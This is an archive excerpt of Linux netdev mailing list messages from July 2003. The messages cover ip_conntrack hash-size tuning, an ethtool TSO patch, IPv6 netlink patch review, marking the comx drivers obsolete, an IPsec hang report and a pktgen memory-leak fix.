Here are the updated patches: http://prdownloads.sourceforge.net/evlog/kerror-2.5.75.patch?download http://prdownloads.sourceforge.net/evlog/evlog-2.5.75.patch?download http://prdownloads.sourceforge.net/evlog/kerrord.tar.gz?download Jim K From dax@gurulabs.com Fri Jul 18 17:12:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 17:12:31 -0700 (PDT) Received: from mail.gurulabs.com (you@[66.62.77.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J0CMFl028163 for ; Fri, 18 Jul 2003 17:12:22 -0700 Received: from dhcp9.hq.gurulabs.com (dhcp9.hq.gurulabs.com [10.1.2.9]) by mail.gurulabs.com (Postfix) with ESMTP id 4368777A0; Fri, 18 Jul 2003 18:12:21 -0600 (MDT) Subject: Memory usage/tuning for ip_conntrack From: Dax Kelson To: Martin Josefsson Cc: netdev@oss.sgi.com In-Reply-To: <1058563690.26030.23.camel@tux.rsn.bth.se> References: <1058558848.2674.88.camel@mentor.gurulabs.com> <1058563690.26030.23.camel@tux.rsn.bth.se> Content-Type: text/plain Message-Id: <1058573540.6491.18.camel@mentor.gurulabs.com> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 18 Jul 2003 18:12:21 -0600 Content-Transfer-Encoding: 7bit X-archive-position: 4165 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dax@gurulabs.com Precedence: bulk X-list: netdev On Fri, 2003-07-18 at 15:28, Martin Josefsson wrote: > Increasing the number of buckets doesn't cost much memory compared to > the actual connections and it gives you a nice performanceboost if you > are trying to handle lots of connections. (the default is based on the > amount of memory in the machine and it's normally ok for desktop > machines and small servers/routers) I just wanted to followup publicly for archival purposes. OK, so getting more into the realm of "best practices", by default the maximum number of connections tracked will be 8x the number of buckets. 
The number of buckets is determined at boot time from the amount of RAM, which in turn determines the maximum number of connections that can be tracked (8 * buckets, see above). This is fine for desktops, small routers, etc.

However, both numbers can be tuned independently of each other. On a box with lots of connections flowing through it (i.e., a dedicated high-volume NAT/firewall/router), you can get better performance if your ratio of maximum connections to buckets is 2:1 instead of the default 8:1.

On Red Hat Linux, to do this tuning, figure out the maximum number of connections you want to track and divide that number in half (make sure the result isn't a 2^n number on kernels < 2.4.21). This is how many buckets you should have. To configure your system with this many buckets, add the following lines to your /etc/modules.conf file. (The 44000 used below is just an example; estimate your worst-case scenario and add 10% to it.)

    # I want a 2:1 connection-to-bucket ratio for good performance.
    # Since I want to have a maximum of 44000 connections tracked, I
    # set the number of buckets to 1/2 that value for a 2:1 ratio.
    options ip_conntrack hashsize=22000

Now by default you'll have 8 * 22000 = 176000 maximum connections, which is much higher than the 44000 you actually want. To readjust this down to the good 2:1 ratio, add the following line to your /etc/sysctl.conf file:

    net.ipv4.ip_conntrack_max = 44000

Now, to figure out the maximum possible memory consumption, do the following:

    (memory used per bucket * number of buckets)
    + (memory used per tracked connection * maximum number of tracked connections)

Memory used per bucket is 8 bytes on 32-bit hardware, 16 bytes on 64-bit hardware. To determine "memory used per tracked connection", run this command:

    grep ip_conntrack /proc/slabinfo | tr -s " " | cut -d " " -f 4

Did I miss anything, or do you have anything to add, Martin?
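For anyone who wants to script the bucket calculation described above, here is a rough sketch. The helper names and the old_hash flag are invented for this example; they are not module parameters or kernel symbols. The "subtract one from a power of two" step simply follows Martin's 2^n-1 advice for kernels older than 2.4.21.

```c
#include <stdbool.h>
#include <stdint.h>

/* True if n is an exact power of two (1, 2, 4, 8, ...). */
static bool is_power_of_two(uint32_t n)
{
    return n != 0 && (n & (n - 1)) == 0;
}

/*
 * Hypothetical helper: suggest a hashsize for a target number of
 * tracked connections.
 *
 *   max_conntracks    connections you want to be able to track
 *   conns_per_bucket  desired ratio, e.g. 2 for the 2:1 setup above
 *   old_hash          true for kernels < 2.4.21, where 2^n sizes are
 *                     discouraged and 2^n-1 is used instead
 *
 * Returns 0 if conns_per_bucket is 0 (no sensible answer).
 */
static uint32_t suggest_hashsize(uint32_t max_conntracks,
                                 uint32_t conns_per_bucket,
                                 bool old_hash)
{
    uint32_t buckets;

    if (conns_per_bucket == 0)
        return 0;

    buckets = max_conntracks / conns_per_bucket;

    /* Step off an exact power of two on old kernels (2^n -> 2^n-1). */
    if (old_hash && buckets > 1 && is_power_of_two(buckets))
        buckets -= 1;

    return buckets;
}
```

For the example in this message, suggest_hashsize(44000, 2, true) returns 22000, which is the value used in the modules.conf line; ip_conntrack_max still has to be set separately via sysctl.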
Dax Kelson Guru Labs From scott.feldman@intel.com Fri Jul 18 20:00:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 20:00:19 -0700 (PDT) Received: from caduceus.sc.intel.com (fmr04.intel.com [143.183.121.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J30CFl001642 for ; Fri, 18 Jul 2003 20:00:13 -0700 Received: from talaria.sc.intel.com (talaria.sc.intel.com [10.3.253.5]) by caduceus.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6J2wnT18361 for ; Sat, 19 Jul 2003 02:58:49 GMT Received: from fmsmsxvs043.fm.intel.com (fmsmsxvs043.fm.intel.com [132.233.42.129]) by talaria.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6J2s4f25284 for ; Sat, 19 Jul 2003 02:54:04 GMT Received: from [134.134.179.196] ([134.134.179.196]) by fmsmsxvs043.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071819570925516 ; Fri, 18 Jul 2003 19:57:09 -0700 Date: Fri, 18 Jul 2003 20:17:01 -0700 (PDT) From: "Feldman, Scott" X-X-Sender: scott.feldman@localhost.localdomain Reply-To: "Feldman, Scott" To: Jeff Garzik cc: davidm@hpl.hp.com, , "Feldman, Scott" Subject: [PATCH] add ethtool TSO get/set Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4166 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev * Add TSO get/set command to ethtool interface. Applies to both 2.4/2.5. Ethtool application patch sent under separate cover. 
--------------- --- linux-2.4.22-pre7/include/linux/ethtool.h.orig 2003-07-18 16:35:05.000000000 -0700 +++ linux-2.4.22-pre7/include/linux/ethtool.h 2003-07-18 16:37:35.000000000 -0700 @@ -281,6 +281,8 @@ #define ETHTOOL_GSTRINGS 0x0000001b /* get specified string set */ #define ETHTOOL_PHYS_ID 0x0000001c /* identify the NIC */ #define ETHTOOL_GSTATS 0x0000001d /* get NIC-specific statistics */ +#define ETHTOOL_GTSO 0x0000001e /* Get TSO enable (ethtool_value) */ +#define ETHTOOL_STSO 0x0000001f /* Set TSO enable (ethtool_value) */ /* compatibility with older code */ #define SPARC_ETH_GSET ETHTOOL_GSET From nalkunda@egr.msu.edu Fri Jul 18 21:29:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 21:29:25 -0700 (PDT) Received: from sys10.mail.msu.edu (sys10.mail.msu.edu [35.9.75.110]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J4TGFl005946 for ; Fri, 18 Jul 2003 21:29:17 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys10.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128) (authenticated as nalkunda) id 19divx-000MZz-00 for netdev@oss.sgi.com; Sat, 19 Jul 2003 00:02:57 -0400 Content-Type: text/plain; charset="us-ascii" From: N N Ashok Organization: CSE, Michigan State University To: netdev@oss.sgi.com Subject: Difference between (struct tc_stats) and (struct net_device_stats) Date: Fri, 18 Jul 2003 23:55:30 -0400 User-Agent: KMail/1.4.3 MIME-Version: 1.0 Message-Id: <200307182355.30867.nalkunda@egr.msu.edu> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6J4TGFl005946 X-archive-position: 4167 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev Hi All, The tc_stats and net_device_stats are defined as below: struct tc_stats { __u64 bytes; /* NUmber of enqueues bytes */ __u32 packets; /* Number of enqueued packets */ 
__u32 drops; /* Packets dropped because of lack of resources */
__u32 overlimits; /* Number of throttle events when this
};

struct net_device_stats {
unsigned long rx_packets; /* total packets received */
unsigned long tx_packets; /* total packets transmitted */
unsigned long rx_bytes; /* total bytes received */
unsigned long tx_bytes; /* total bytes transmitted */
unsigned long rx_errors; /* bad packets received */
unsigned long tx_errors; /* packet transmit problems */
unsigned long rx_dropped; /* no space in linux buffers */
unsigned long tx_dropped; /* no space available in linux */
unsigned long multicast; /* multicast packets received */
unsigned long collisions;
};

I added an estimator to one of my interfaces and observed that the bytes and packets values in tc_stats for the estimator are not the same as the rx_packets and rx_bytes values of net_device_stats obtained by get_stats(dev) for the same interface at almost the same time. Is there a difference in the meaning or range of the fields in the two structures?

In net_device_stats we have counts for drops and errors, but there are no such fields in tc_stats. Are these counts also included in the bytes and packets fields of tc_stats?
Thanks, Ashok From andersg@0x63.nu Fri Jul 18 23:47:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 23:48:02 -0700 (PDT) Received: from gagarin.0x63.nu (mail@h55p111.delphi.afb.lu.se [130.235.187.184]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J6lqFl011432 for ; Fri, 18 Jul 2003 23:47:55 -0700 Received: from andersg by gagarin.0x63.nu with local (Exim 3.36 #1 (Debian)) id 19dRod-0002yV-00; Fri, 18 Jul 2003 11:46:15 +0200 Date: Fri, 18 Jul 2003 11:46:15 +0200 To: "YOSHIFUJI Hideaki / 吉藤英明" Cc: netdev@oss.sgi.com Subject: Re: OOPS in ip6_output2 Message-ID: <20030718094615.GD5964@h55p111.delphi.afb.lu.se> References: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> <20030718.114012.60686118.yoshfuji@linux-ipv6.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030718.114012.60686118.yoshfuji@linux-ipv6.org> User-Agent: Mutt/1.5.4i From: Anders Gustafsson X-Scanner: exiscan *19dRod-0002yV-00*4fMG.NzuwMQ*0x63.nu X-archive-position: 4168 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andersg@0x63.nu Precedence: bulk X-list: netdev On Fri, Jul 18, 2003 at 11:40:12AM +0200, YOSHIFUJI Hideaki / 吉藤英明 wrote: > In article <20030717151354.GA10640@h55p111.delphi.afb.lu.se> (at Thu, 17 Jul 2003 17:13:54 +0200), Anders Gustafsson says: > > > I don't follow netdev so maybe this is old stuff, but I got this oops when > > trying to ssh to a ipv6-host. > > What version are you using? > (Current tree may have fix for this.) > Thanks. Latest bk as of Wednesday, I think. It happened just once in that kernel, so I don't really know whether it's solved in the latest bk, which I run now. 
-- Anders Gustafsson - andersg@0x63.nu - http://0x63.nu/ From davem@redhat.com Fri Jul 18 23:51:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 23:51:56 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J6pqFl011871 for ; Fri, 18 Jul 2003 23:51:52 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA29798; Fri, 18 Jul 2003 23:41:10 -0700 Date: Fri, 18 Jul 2003 23:41:10 -0700 From: "David S. Miller" To: kuznet@ms2.inr.ac.ru Cc: pekkas@netcore.fi, mika.liljeberg@welho.com, jmorris@redhat.com, netdev@oss.sgi.com, dlstevens@us.ibm.com Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast Message-Id: <20030718234110.75ead085.davem@redhat.com> In-Reply-To: <200307172052.AAA15032@dub.inr.ac.ru> References: <200307172052.AAA15032@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4169 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 00:52:03 +0400 (MSD) kuznet@ms2.inr.ac.ru wrote: > Done, the patch enclosed. Applied, thanks everyone. From davem@redhat.com Fri Jul 18 23:58:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 23:58:06 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J6w2Fl012392 for ; Fri, 18 Jul 2003 23:58:02 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA29820; Fri, 18 Jul 2003 23:47:30 -0700 Date: Fri, 18 Jul 2003 23:47:30 -0700 From: "David S. 
Miller" To: Krishna Kumar Cc: yoshfuji@linux-ipv6.org, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, linux-net@vger.kernel.org, krkumar@us.ibm.com Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 Message-Id: <20030718234730.2043bc1f.davem@redhat.com> In-Reply-To: References: <20030718.004701.11546819.yoshfuji@linux-ipv6.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4170 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 17:37:18 -0700 (PDT) Krishna Kumar wrote: > > Yes, please split up the patch. > > Following is the split patch for prefix list and O/M flags. Alexey, others, please tell me if I should apply these two patches. Thanks. From yoshfuji@linux-ipv6.org Sat Jul 19 00:31:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 00:31:57 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J7VfFl014006 for ; Sat, 19 Jul 2003 00:31:42 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6J7XHBo022008; Sat, 19 Jul 2003 16:33:18 +0900 Date: Sat, 19 Jul 2003 09:33:16 +0200 (CEST) Message-Id: <20030719.093316.45294671.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030718.004701.11546819.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA 
X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4171 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Thu, 17 Jul 2003 17:37:18 -0700 (PDT)), Krishna Kumar says: > > Anyway, it seems we're reaching consensus. > > Great! Glad we have reached consensus because I am exhausted! Since you > have agreed to the above proposal, the prefix list patch has to be applied > before the O/M flags patch. I have kept the RTM_GETLNKINFO and specified > a new option to get the flags information, this can be extended later to > add more options for other parameters. We're reaching consensus, but have not reached it yet. :-p First part (prefixlist) seems ok to me. Second part does not. > -------- Patch for O/M flags against 2.5.73 (dependent on previous patch ----- > diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h > --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 > +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-17 16:57:52.000000000 -0700 > @@ -47,7 +47,9 @@ > #define RTM_DELTFILTER (RTM_BASE+29) > #define RTM_GETTFILTER (RTM_BASE+30) > > -#define RTM_MAX (RTM_BASE+31) > +#define RTM_GETLNKINFO (RTM_BASE+34) > + > +#define RTM_MAX (RTM_GETLNKINFO+1) > > /* > Generic structure for encapsulation of optional route information. This is what we don't have consensus on. We need to decide whether to create new RTM_xxxIFACE or to reuse RTM_xxxLINK (and activate ifi_family :-)). 
> @@ -61,6 +63,13 @@ > unsigned short rta_type; > }; > > +/* Structure to return per interface device flags */ > +struct ifp_if6info > +{ > + int ifindex; > + int flags; > +}; > + > /* Macros to handle rtattributes */ > > #define RTA_ALIGNTO 4 ditto. > @@ -331,6 +340,7 @@ > IFA_LABEL, > IFA_BROADCAST, > IFA_ANYCAST, > + IFA_IFFLAGS, > IFA_CACHEINFO > }; Don't change values. > diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c > --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 > +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700 > @@ -2451,6 +2451,43 @@ > netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); > } > > +int inet6_dump_linkinfo(struct sk_buff *skb, struct netlink_callback *cb) > +{ > + int ifindex, flags; > + struct net_device *dev; : > static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { > [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, > [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, > @@ -2459,6 +2496,7 @@ > [RTM_DELROUTE - RTM_BASE] = { .doit = inet6_rtm_delroute, }, > [RTM_GETROUTE - RTM_BASE] = { .doit = inet6_rtm_getroute, > .dumpit = inet6_dump_fib, }, > + [RTM_GETLNKINFO - RTM_BASE] = {.dumpit = inet6_dump_linkinfo, }, > }; > same as first comment for this part. 
-- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From gorgo@bpdcad01.bpdc.broadband.hu Sat Jul 19 01:14:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 01:14:24 -0700 (PDT) Received: from bpdcad01.bpdc.broadband.hu (bpdcad01.bpdc.broadband.hu [195.184.180.129]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6J8E6Fl015846 for ; Sat, 19 Jul 2003 01:14:12 -0700 Received: by bpdcad01.bpdc.broadband.hu (Postfix, from userid 1000) id 289361C099; Sat, 19 Jul 2003 10:14:00 +0200 (CEST) Date: Sat, 19 Jul 2003 10:14:00 +0200 From: Gergely Madarasz To: Stephen Hemminger Cc: Jeff Garzik , Gergely Madarasz , netdev@oss.sgi.com, don@itc.hu Subject: Re: comx drivers in 2.6 Message-ID: <20030719081400.GP1553@bpdcad01.bpdc.broadband.hu> References: <20030717163337.78d123c0.shemminger@osdl.org> <3F173458.6060405@pobox.com> <20030718123625.6f8ae9b9.shemminger@osdl.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030718123625.6f8ae9b9.shemminger@osdl.org> User-Agent: Mutt/1.3.28i X-archive-position: 4172 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gorgo@thunderchild.debian.net Precedence: bulk X-list: netdev On Fri, Jul 18, 2003 at 12:36:25PM -0700, Stephen Hemminger wrote: > On Thu, 17 Jul 2003 19:42:16 -0400 > Jeff Garzik wrote: > > > Stephen Hemminger wrote: > > > It looks like the comx drivers never got updated for 2.5/2.6. Some > > > obvious issues are: > > > - lots of use of /proc files without setting the owner field. > > > - still using cli/sti > > > - no SMP locking on the linked list (which could be changed to list macros) > > > of hardware and protocols. > > > > > > Just bumped into this while trying to inspect for all the last possible > > > broken usage of net_device structure. It is too far behind to address > > > those issues. 
> > > > > > Submit a patch to mark these CONFIG_OBSOLETE. AFAIK nobody has cared > > for most of them since 2.2... (munich is an exception) > > > > diff -Nru a/drivers/net/wan/Kconfig b/drivers/net/wan/Kconfig > --- a/drivers/net/wan/Kconfig Fri Jul 18 11:55:47 2003 > +++ b/drivers/net/wan/Kconfig Fri Jul 18 11:55:47 2003 > @@ -60,9 +60,10 @@ > # > # COMX drivers > # > +# Not updated to 2.6. > config COMX > tristate "MultiGate (COMX) synchronous serial boards support" > - depends on WAN && (ISA || PCI) > + depends on WAN && (ISA || PCI) && OBSOLETE > ---help--- > Say Y if you want to use any board from the MultiGate (COMX) family. > These boards are synchronous serial adapters for the PC, Please add the following patch too. I'm surprised I still haven't been removed from the MAINTAINERS file, though I left itc almost two years ago. --- MAINTAINERS~ Mon Jul 14 05:35:12 2003 +++ MAINTAINERS Sat Jul 19 10:12:14 2003 @@ -420,8 +420,8 @@ S: Supported COMX/MULTIGATE SYNC SERIAL DRIVERS -P: Gergely Madarasz -M: Gergely Madarasz +P: Pasztor Szilard +M: Pasztor Szilard S: Supported COSA/SRP SYNC SERIAL DRIVER -- Madarasz Gergely gorgo@thunderchild.debian.net gorgo@linux.rulez.org It's practically impossible to look at a penguin and feel angry. Egy pingvinre gyakorlatilag lehetetlen haragosan nezni. 
From sneakums@zork.net Sat Jul 19 06:40:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 06:40:59 -0700 (PDT) Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JDeoFl000622 for ; Sat, 19 Jul 2003 06:40:50 -0700 Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19drxB-00086I-00; Sat, 19 Jul 2003 06:40:49 -0700 To: netdev@oss.sgi.com Cc: linux-kernel@vger.kernel.org Subject: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds From: Sean Neakums Mail-Followup-To: netdev@oss.sgi.com, linux-kernel@vger.kernel.org Date: Sat, 19 Jul 2003 14:40:48 +0100 Message-ID: <6uk7aeab33.fsf@zork.zork.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 4173 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: sneakums@zork.net Precedence: bulk X-list: netdev I've just set up transport mode IPsec between two machines with the aid of the LARTC IPsec docs. Both boxes are running 2.6.0-test1-mm1, with a wireless/wired bridge between, using ipsec-tools 0.2.2. Everything seems to be in order, except (big except) that TCP sessions hang after a small number of seconds of use, usually between ten and twenty. The problem seems unrelated to the amount of data transferred; I've tried both bulk rsync transfers and ssh sessions. I've also tested the same boxes over 100baseT; still happens. I'm not exactly sure what additional information to supply; my experience with IPsec is limited to this past few hours' experimentation. 
From Robert.Olsson@data.slu.se Sat Jul 19 09:33:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 09:33:50 -0700 (PDT) Received: from robur.slu.se (robur.slu.se [130.238.98.12]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JGXdFl008977 for ; Sat, 19 Jul 2003 09:33:40 -0700 Received: (from robert@localhost) by robur.slu.se (8.9.3p2/8.9.3) id SAA07679; Sat, 19 Jul 2003 18:32:33 +0200 From: Robert Olsson MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16153.29344.964485.457389@robur.slu.se> Date: Sat, 19 Jul 2003 18:32:32 +0200 To: "Kambo Lohan" Cc: netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: PATCH pktgen hang, memleak, fixes In-Reply-To: References: X-Mailer: VM 6.92 under Emacs 19.34.1 X-archive-position: 4174 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Robert.Olsson@data.slu.se Precedence: bulk X-list: netdev Thanks! It looks fine. Jeff cross-posted to netdev which is the appropriate list. It goes for both 2.4 and 2.5 versions. We ask DaveM to apply. Cheers. --ro Kambo Lohan writes: > This should fix about 3 things. My first patch, be gentle... > > 2.5 has the same problem but I do not know if this will apply or not, we run > 2.4. --- linux/net/core/pktgen.c.orig Thu Jul 17 16:00:14 2003 +++ linux/net/core/pktgen.c Thu Jul 17 16:37:21 2003 @@ -47,6 +47,9 @@ * Also moved to /proc/net/pktgen/ * --ro * + * Fix refcount off by one if first packet fails, potential null deref, + * memleak 030710- KJP + * * See Documentation/networking/pktgen.txt for how to use this. 
*/ @@ -85,9 +88,9 @@ #define cycles() ((u32)get_cycles()) -#define VERSION "pktgen version 1.2" +#define VERSION "pktgen version 1.2.1" static char version[] __initdata = - "pktgen.c: v1.2: Packet Generator for packet performance testing.\n"; + "pktgen.c: v1.2.1: Packet Generator for packet performance testing.\n"; /* Used to help with determining the pkts on receive */ @@ -611,12 +614,11 @@ kfree_skb(skb); skb = fill_packet(odev, info); if (skb == NULL) { - break; + goto out_reldev; } fp++; fp_tmp = 0; /* reset counter */ } - atomic_inc(&skb->users); } nr_frags = skb_shinfo(skb)->nr_frags; @@ -632,6 +634,7 @@ last_ok = 0; } else { + atomic_inc(&skb->users); last_ok = 1; info->sofar++; info->seq_num++; @@ -729,7 +732,9 @@ (unsigned long long) info->errors ); } - + + kfree_skb(skb); + out_reldev: if (odev) { dev_put(odev); From alan@lxorguk.ukuu.org.uk Sat Jul 19 10:08:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 10:08:27 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (pc2-cwma1-4-cust86.swan.cable.ntl.com [213.105.254.86]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6JH8EFl011125 for ; Sat, 19 Jul 2003 10:08:15 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h6JH5kKd022265 for ; Sat, 19 Jul 2003 18:05:47 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h6JH5ksb022263 for netdev@oss.sgi.com; Sat, 19 Jul 2003 18:05:46 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: [Fwd: kernel 2.4.21] From: Alan Cox To: netdev@oss.sgi.com Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 19 Jul 2003 18:05:45 +0100 X-archive-position: 4175 X-ecartis-version: Ecartis v1.0.0 Sender: 
netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev -----Forwarded Message----- > From: Cedric Gavage > To: linux-kernel@vger.kernel.org > Subject: kernel 2.4.21 > Date: 19 Jul 2003 16:38:11 +0200 > > Hi all, > > I have a little question... > > > Summary of changes from v2.4.21-pre4 to v2.4.21-pre5 > ============================================ > > Alan Cox : > o ACPI apparently wasnt bios > o fix wrong date in microcode comment > o add another legitimate P4 type > o must disallow write combine on 450NX > o add framework for ndelay (nanoseconds) > o first block of parisc resend > o second block of parisc merge > o third block of parisc merge > o Ian Nelson moved > o update videobook docs to avoid check_region > o docs for IPMI > o remove dead init call > o add AMD hammer rng > o IPMI driver updates > o keyboard changes > o fix wrong test in raw driver > o fix paths for ide > o clarify hpt37x config > o fix more ide paths > o Paul's fix to do ide_cs handling in task context > o more ide paths > o fix use of check_region in umc driver > o more ide comment/doc info updates > o promise printk cleanups > o another wrong path > o IDE printk/cleanup bits > o fix padding on eepro driver > > In this patch, is it possible that there is a problem in the fix of > eepro driver? Since I upgrade the kernel with 2.4.20-8 (kernel-source > tag in debian) which include this patch I have some problem with packets > which are sometimes truncated... (the server runs an ircd and the result 